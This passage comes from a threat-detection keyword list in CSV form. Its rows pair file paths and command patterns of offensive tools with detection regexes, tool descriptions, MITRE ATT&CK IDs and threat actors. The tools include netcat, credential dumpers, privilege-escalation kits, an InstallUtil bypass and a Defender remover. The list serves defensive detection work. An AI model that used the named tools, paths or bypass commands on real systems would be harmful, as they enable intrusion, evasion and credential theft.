PowerUpSQL also includes many functions that can be used by administrators to quickly inventory the SQL Servers in their ADS domain and perform common threat hunting tasks related to SQL Server.","T1078.002 - T1547.001 - T1059.001 - T1106 - T1550.002 - T1087 - T1003 - T1053 - T1047","TA0003 - TA0002 - TA0008 - TA0011 - TA0006","N/A","Black Basta","C2","https://github.com/NetSPI/PowerUpSQL","1","0","N/A","N/A","10","10","2564","472","2024-12-12T18:09:39Z","2016-06-22T01:22:39Z","19724" "*\Windows\Microsoft.NET\*\InstallUtil.exe /logfile= /LogToConsole=false /U *:\Windows\Tasks\*",".{0,1000}\\Windows\\Microsoft\.NET\\.{0,1000}\\InstallUtil\.exe\s\/logfile\=\s\/LogToConsole\=false\s\/U\s.{0,1000}\:\\Windows\\Tasks\\.{0,1000}","offensive_tool_keyword","bypass-clm","PowerShell Constrained Language Mode Bypass","T1059.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/calebstewart/bypass-clm","1","0","N/A","N/A","8","3","261","38","2021-01-31T19:13:55Z","2021-01-29T04:46:23Z","19725" "*\windows\system32\badger.exe*",".{0,1000}\\windows\\system32\\badger\.exe.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","19730" "*\Windows\System32\nc.exe*",".{0,1000}\\Windows\\System32\\nc\.exe.{0,1000}","offensive_tool_keyword","nopowershell","NoPowerShell is a tool implemented in C# which supports executing PowerShell-like commands while remaining invisible to any PowerShell logging mechanisms. 
This .NET Framework 2 compatible binary can be loaded in Cobalt Strike to execute commands in-memory. No System.Management.Automation.dll is used. only native .NET libraries. An alternative usecase for NoPowerShell is to launch it as a DLL via rundll32.exe: rundll32 NoPowerShell.dll.main.","T1059 - T1086 - T1500 - T1564 - T1127 - T1027","TA0002 - TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/bitsadmin/nopowershell","1","0","N/A","N/A","10","10","977","138","2025-04-11T09:25:41Z","2018-11-28T21:07:51Z","19731" "*\Windows\System32\uploaded.txt*",".{0,1000}\\Windows\\System32\\uploaded\.txt.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","19734" "*\Windows\Tasks\a.exe*",".{0,1000}\\Windows\\Tasks\\a\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","19736" "*\windows\tasks\bin.exe*",".{0,1000}\\windows\\tasks\\bin\.exe.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation 
tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","N/A","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","19737" "*\Windows\Tasks\Certipy*",".{0,1000}\\Windows\\Tasks\\Certipy.{0,1000}","offensive_tool_keyword","certsync","Dump NTDS with golden certificates and UnPAC the hash","T1553.002 - T1003.001 - T1145 - T1649","TA0002 - TA0003 - TA0006","N/A","N/A","Credential Access","https://github.com/zblurx/certsync","1","0","N/A","N/A","10","7","633","66","2024-03-20T10:58:15Z","2023-01-31T15:37:12Z","19738" "*\Windows\Tasks\p4yl0ad*",".{0,1000}\\Windows\\Tasks\\p4yl0ad.{0,1000}","offensive_tool_keyword","EventViewer-UACBypass","RCE through Unsafe .Net Deserialization in Windows Event Viewer which leads to UAC bypass","T1078.004 - T1216 - T1068","TA0004 - TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/CsEnox/EventViewer-UACBypass","1","0","N/A","N/A","10","2","184","21","2022-04-29T09:42:37Z","2022-04-27T12:56:59Z","19739" "*\windows\temp\123.exe*",".{0,1000}\\windows\\temp\\123\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","19741" "*\Windows\Temp\Bla.exe*",".{0,1000}\\Windows\\Temp\\Bla\.exe.{0,1000}","offensive_tool_keyword","SharpHide","Tool to create hidden registry keys","T1112 - T1562 - T1562.001","TA0005 - 
TA0003","N/A","N/A","Persistence","https://github.com/outflanknl/SharpHide","1","0","N/A","N/A","9","5","480","96","2019-10-23T10:44:22Z","2019-10-20T14:25:47Z","19742" "*\windows\temp\CreateService.ps1*",".{0,1000}\\windows\\temp\\CreateService\.ps1.{0,1000}","offensive_tool_keyword","Dispossessor","script used by Dispossessor ransomware group","T1562.001 - T1112 - T1059 - T1036","TA0005 - TA0040","N/A","Dispossessor","Defense Evasion","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","4","8","N/A","N/A","N/A","N/A","19743" "*\Windows\Temp\creds.db*",".{0,1000}\\Windows\\Temp\\creds\.db.{0,1000}","offensive_tool_keyword","IIS-Raid","A native backdoor module for Microsoft IIS","T1505.003 - T1059.001 - T1071.001","TA0002 - TA0011","N/A","N/A","C2","https://github.com/0x09AL/IIS-Raid","1","0","N/A","N/A","10","10","541","124","2020-07-03T13:31:42Z","2020-02-17T16:28:10Z","19744" "*\windows\temp\fakefile.exe*",".{0,1000}\\windows\\temp\\fakefile\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","0","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","19745" "*\Windows\Temp\Forensike*",".{0,1000}\\Windows\\Temp\\Forensike.{0,1000}","offensive_tool_keyword","Forensike","Remotely dump NT hashes through Windows Crash dumps","T1003","TA0006","N/A","N/A","Credential 
Access","https://github.com/bmarchev/Forensike","1","0","N/A","N/A","10","1","27","3","2024-10-29T00:13:50Z","2024-02-01T13:52:55Z","19746" "*\Windows\Temp\info_gather.txt*",".{0,1000}\\Windows\\Temp\\info_gather\.txt.{0,1000}","offensive_tool_keyword","Rust-Malware-Samples","open source informations stealer in rust","T1003 - T1083 - T1114 - T1074","TA0006 - TA0009 - TA0005","N/A","N/A","Credential Access","https://github.com/Whitecat18/Rust-for-Malware-Development/tree/main/Malware-Samples","1","0","N/A","N/A","10","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","19747" "*\windows\temp\nc64.exe*",".{0,1000}\\windows\\temp\\nc64\.exe.{0,1000}","offensive_tool_keyword","RogueWinRM","RogueWinRM is a local privilege escalation exploit that allows to escalate from a Service account (with SeImpersonatePrivilege) to Local System account if WinRM service is not running","T1548.003 - T1134.002 - T1055","TA0004","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/RogueWinRM","1","0","N/A","N/A","10","8","788","107","2020-02-23T19:26:41Z","2019-12-02T22:58:03Z","19748" "*\windows\temp\ncat.exe -nv *",".{0,1000}\\windows\\temp\\ncat\.exe\s\-nv\s.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","0","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","19749" "*\Windows\temp\payload.bin*",".{0,1000}\\Windows\\temp\\payload\.bin.{0,1000}","offensive_tool_keyword","Voidgate","bypass AV/EDR memory scanners. 
This can be used to hide well-known and detected shellcodes","T1027 - T1070 - T1055","TA0005","N/A","N/A","Defense Evasion","https://github.com/undergroundwires/privacy.sexy","1","0","N/A","N/A","9","10","4632","198","2025-04-21T21:36:39Z","2019-12-31T14:38:28Z","19750" "*\Windows\temp\payload.exe*",".{0,1000}\\Windows\\temp\\payload\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","19751" "*\windows\temp\pwned.trx*",".{0,1000}\\windows\\temp\\pwned\.trx.{0,1000}","offensive_tool_keyword","PowerSharpPack","Many useful offensive CSharp Projects wraped into Powershell for easy usage","T1059.001 - T1027 - T1055.012","TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/S3cur3Th1sSh1t/PowerSharpPack","1","0","N/A","N/A","10","10","1581","308","2025-04-14T13:31:01Z","2020-04-06T16:34:52Z","19752" "*\Windows\Temp\Results.txt*",".{0,1000}\\Windows\\Temp\\Results\.txt.{0,1000}","offensive_tool_keyword","responder","LLMNR. 
NBT-NS and MDNS poisoner","T1557.001 - T1171 - T1547.011 - T1040","TA0011 - TA0006 - TA0007","N/A","Lazarus Group - APT28 - FANCY BEAR - EMBER BEAR","Sniffing & Spoofing","https://github.com/lgandx/Responder-Windows/","1","0","N/A","N/A","N/A","6","523","137","2024-07-30T11:10:05Z","2015-02-07T22:59:04Z","19753" "*\windows\temp\sam.tmp*",".{0,1000}\\windows\\temp\\sam\.tmp.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","N/A","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","19755" "*\windows\temp\sam.tmp*",".{0,1000}\\windows\\temp\\sam\.tmp.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","19756" "*\windows\temp\sec.tmp*",".{0,1000}\\windows\\temp\\sec\.tmp.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","N/A","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","19759" "*\windows\temp\sec.tmp*",".{0,1000}\\windows\\temp\\sec\.tmp.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral 
Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","19760" "*\windows\temp\sys.tmp*",".{0,1000}\\windows\\temp\\sys\.tmp.{0,1000}","offensive_tool_keyword","KrbRelay-SMBServer","acts as an SMB server (instead of DCOM) to relay Kerberos AP-REQ to CIFS or HTTP","T1557 - T1021 - T1205 - T1071","TA0006 - TA0008 - TA0010","N/A","Black Basta","Lateral Movement","https://github.com/decoder-it/KrbRelay-SMBServer","1","0","N/A","N/A","9","3","215","26","2024-10-08T14:55:59Z","2024-10-05T12:28:55Z","19761" "*\windows\temp\sys.tmp*",".{0,1000}\\windows\\temp\\sys\.tmp.{0,1000}","offensive_tool_keyword","RemoteKrbRelay","similar to KrbRelay and KrbRelayUp but With RemoteKrbRelay this can be done remotely","T1550.004 - T1557.001 - T1021.005 - T1105","TA0008 - TA0005","N/A","N/A","Lateral Movement","https://github.com/CICADA8-Research/RemoteKrbRelay","1","0","N/A","N/A","10","6","581","90","2024-06-30T14:08:50Z","2024-06-24T17:38:46Z","19762" "*\Windows\Temp\temp.ps1*",".{0,1000}\\Windows\\Temp\\temp\.ps1.{0,1000}","offensive_tool_keyword","crackmapexec","CrackMapExec behavior","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002 - T1047","TA0001 - TA0002 - TA0007 - TA0008","N/A","APT39 - Dragonfly - FIN7 - MuddyWater - ENERGETIC BEAR - EMBER BEAR - BERSERK BEAR - Black Basta","Lateral Movement","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","10","8690","1667","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z","19764" "*\Windows\Ui\index.html*",".{0,1000}\\Windows\\Ui\\index\.html.{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - 
TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","N/A","10","3","252","80","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z","19765" "*\windows_downdate.py*",".{0,1000}\\windows_downdate\.py.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","0","N/A","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","19766" "*\windows_x64_admin.exe*",".{0,1000}\\windows_x64_admin\.exe.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","19767" "*\windows_x64_agent.exe*",".{0,1000}\\windows_x64_agent\.exe.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","19768" "*\windows_x86_admin.exe*",".{0,1000}\\windows_x86_admin\.exe.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","19769" "*\windows_x86_agent.exe*",".{0,1000}\\windows_x86_agent\.exe.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - 
TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","19770" "*\windows-defender-remover\*",".{0,1000}\\windows\-defender\-remover\\.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","19772" "*\windows-defender-remover-main*",".{0,1000}\\windows\-defender\-remover\-main.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","19773" "*\WindowsDowndate-main*",".{0,1000}\\WindowsDowndate\-main.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","0","N/A","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","19774" "*\Windows-Passwords.ps1*",".{0,1000}\\Windows\-Passwords\.ps1.{0,1000}","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential 
Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","N/A","10","10","904","310","2024-09-14T02:34:26Z","2021-09-08T20:33:18Z","19775" "*\WindowsShareFinder.cs*",".{0,1000}\\WindowsShareFinder\.cs.{0,1000}","offensive_tool_keyword","SMBeagle","SMBeagle is an (SMB) fileshare auditing tool that hunts out all files it can see in the network and reports if the file can be read and/or written. All these findings are streamed out to either a CSV file or an elasticsearch host.","T1087.002 - T1021.002 - T1210","TA0007 - TA0008 - TA0003","N/A","N/A","Discovery","https://github.com/punk-security/SMBeagle","1","0","N/A","N/A","9","8","712","80","2025-01-21T22:34:00Z","2021-05-31T19:46:57Z","19776" "*\winexesvc.exe*",".{0,1000}\\winexesvc\.exe.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","0","#servicename","N/A","8","8","N/A","N/A","N/A","N/A","19777" "*\WINHELLO2hashcat.py*",".{0,1000}\\WINHELLO2hashcat\.py.{0,1000}","offensive_tool_keyword","wcreddump","Fully automated windows credentials dumper from SAM (classic passwords) and WINHELLO (pins). 
Requires to be run from a linux machine with a mounted windows drive.","T1003 - T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/truerustyy/wcreddump","1","0","#linux #windows","N/A","10","1","75","5","2024-11-18T18:37:28Z","2024-03-05T00:00:20Z","19778" "*\win-key-killer.ps1*",".{0,1000}\\win\-key\-killer\.ps1.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","N/A","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","19779" "*\Winner Rat.exe*",".{0,1000}\\Winner\sRat\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","19780" "*\winPEAS.exe*",".{0,1000}\\winPEAS\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","0","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","19781" "*\winPEAS.exe*",".{0,1000}\\winPEAS\.exe.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 
Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","19782" "*\winPEAS.exe*",".{0,1000}\\winPEAS\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","winPEAS","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","19783" "*\winPEAS.exe*",".{0,1000}\\winPEAS\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","19784" "*\winPEAS.exe*",".{0,1000}\\winPEAS\.exe.{0,1000}","offensive_tool_keyword","winPEAS","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR 
- Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","winPEAS","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","19785" "*\winPEAS.ps1*",".{0,1000}\\winPEAS\.ps1.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","19786" "*\winPEAS.sln*",".{0,1000}\\winPEAS\.sln.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","19787" "*\winPEASany.exe*",".{0,1000}\\winPEASany\.exe.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","19788" "*\winPEASany.exe*",".{0,1000}\\winPEASany\.exe.{0,1000}","offensive_tool_keyword","winPEAS","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - 
Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","N/A","winPEAS","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","19789" "*\winPEASany_ofs.exe*",".{0,1000}\\winPEASany_ofs\.exe.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","19790" "*\winPEASany_ofs.exe*",".{0,1000}\\winPEASany_ofs\.exe.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","N/A","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","19791" "*\winPEASexe\*",".{0,1000}\\winPEASexe\\.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","N/A","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","19792" "*\winPEAS-Obfuscated.exe*",".{0,1000}\\winPEAS\-Obfuscated\.exe.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege 